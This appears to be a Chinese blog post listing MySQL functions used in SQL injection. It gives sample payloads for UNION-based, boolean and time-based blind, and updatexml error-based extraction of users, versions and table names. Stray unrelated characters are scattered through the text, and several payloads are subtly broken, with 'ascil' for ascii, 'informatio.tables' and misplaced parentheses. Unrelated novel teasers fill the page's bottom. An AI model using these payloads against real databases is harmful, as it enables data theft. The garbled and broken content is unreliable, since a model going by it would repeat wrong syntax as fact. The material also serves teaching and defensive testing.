sql 注入會(huì)遇到的一些函數(shù)

函數(shù)名稱 作用

system_user() 系統(tǒng)用戶名

user() 用戶名

current_user() 當(dāng)前用戶名

session_user() 連接數(shù)據(jù)庫的用戶名

database() 數(shù)據(jù)庫名

version() 數(shù)據(jù)庫版本

@@version() 數(shù)據(jù)庫版本

@@datadir 數(shù)據(jù)庫路徑

@@basedir 數(shù)據(jù)庫安裝路徑

@@version_compile_os 操作系統(tǒng)

count() 執(zhí)行返回結(jié)果的數(shù)量

concat() 沒有分隔符的鏈接字符串

concat_ws() 含有分隔符鏈接字符串

group_concat() 鏈接一個(gè)組的字符串,以逗號(hào)分開

load_file() 讀文件

into outfile 寫文件

ascil() 字符串的ascil代碼值

ord() 返回字符串的第一個(gè)ascil值

mid() 返回字符串的一部分

           例子:select mid ('mysql',1,1)

substr()

          例子:select substr('mysql',1,1)

length() 判斷長度

floor 返回小于或等于x的最大整數(shù)

         例子:select floor(5.9)   結(jié)果返回5

extractvalue() 第一個(gè)參數(shù):xml對(duì)象名稱释牺,第二參數(shù)為xpath字符串

                        作用:從目標(biāo)xml中返回包含查詢的字符串

updatexml() 第一個(gè)參數(shù)壹将,xml對(duì)象名

                      第二個(gè)參數(shù),xpath表達(dá)式

                       第三個(gè)參數(shù)匆瓜,新的字符串,替換查找到的符合條件的數(shù)據(jù)

                      改變字符文檔符合的節(jié)點(diǎn)值

sleep() 睡眠

if select if (1>2,2,3); 如果表達(dá)式為真返回第二個(gè)胸嘴,否則返回第三個(gè)

               結(jié)果:3

char() 返回整數(shù)ascil的字符串

sql注入樣例分析埠对;

and 1=2 union select 1,2,3 --+

select user() regexp '^ro'

ascil(substr(select user(),1,1)) =114

if(ascil(substr(select user(),1,1)=114,0,sleep(5))

(ascil(substr(select table_name from informatio.tables where table_schema=database() limit 0,1),1,1))=9)

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
禁止轉(zhuǎn)載,如需轉(zhuǎn)載請通過簡信或評(píng)論聯(lián)系作者汹碱。
  • 人面猴
    序言:七十年代末粘衬,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子咳促,更是在濱河造成了極大的恐慌稚新,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,525評(píng)論 6 507
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件跪腹,死亡現(xiàn)場離奇詭異褂删,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)尺迂,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,203評(píng)論 3 395
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來冒掌,“玉大人噪裕,你說我怎么就攤上這事」珊粒” “怎么了膳音?”我有些...
    開封第一講書人閱讀 164,862評(píng)論 0 354
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長铃诬。 經(jīng)常有香客問我祭陷,道長苍凛,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,728評(píng)論 1 294
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任兵志,我火速辦了婚禮醇蝴,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘想罕。我一直安慰自己悠栓,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,743評(píng)論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布按价。 她就那樣靜靜地躺著惭适,像睡著了一般。 火紅的嫁衣襯著肌膚如雪楼镐。 梳的紋絲不亂的頭發(fā)上癞志,一...
    開封第一講書人閱讀 51,590評(píng)論 1 305
  • 城市分裂傳說
    那天,我揣著相機(jī)與錄音框产,去河邊找鬼凄杯。 笑死,一個(gè)胖子當(dāng)著我的面吹牛茅信,可吹牛的內(nèi)容都是我干的盾舌。 我是一名探鬼主播,決...
    沈念sama閱讀 40,330評(píng)論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼蘸鲸,長吁一口氣:“原來是場噩夢啊……” “哼妖谴!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起酌摇,我...
    開封第一講書人閱讀 39,244評(píng)論 0 276
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對(duì)情侶失蹤膝舅,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后窑多,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體仍稀,經(jīng)...
    沈念sama閱讀 45,693評(píng)論 1 314
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,885評(píng)論 3 336
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年埂息,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了技潘。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,001評(píng)論 1 348
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡千康,死狀恐怖享幽,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情拾弃,我是刑警寧澤值桩,帶...
    沈念sama閱讀 35,723評(píng)論 5 346
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布,位于F島的核電站豪椿,受9級(jí)特大地震影響奔坟,放射性物質(zhì)發(fā)生泄漏携栋。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,343評(píng)論 3 330
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一咳秉、第九天 我趴在偏房一處隱蔽的房頂上張望婉支。 院中可真熱鬧,春花似錦滴某、人聲如沸磅摹。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,919評(píng)論 0 22
  • 一樁弒父案霎奢,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽户誓。三九已至,卻和暖如春幕侠,著一層夾襖步出監(jiān)牢的瞬間帝美,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,042評(píng)論 1 270
  • 情欲美人皮
    我被黑心中介騙來泰國打工晤硕, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留悼潭,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,191評(píng)論 3 370
  • 代替公主和親
    正文 我出身青樓舞箍,卻偏偏與公主長得像舰褪,于是被迫代替她去往敵國和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子疏橄,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,955評(píng)論 2 355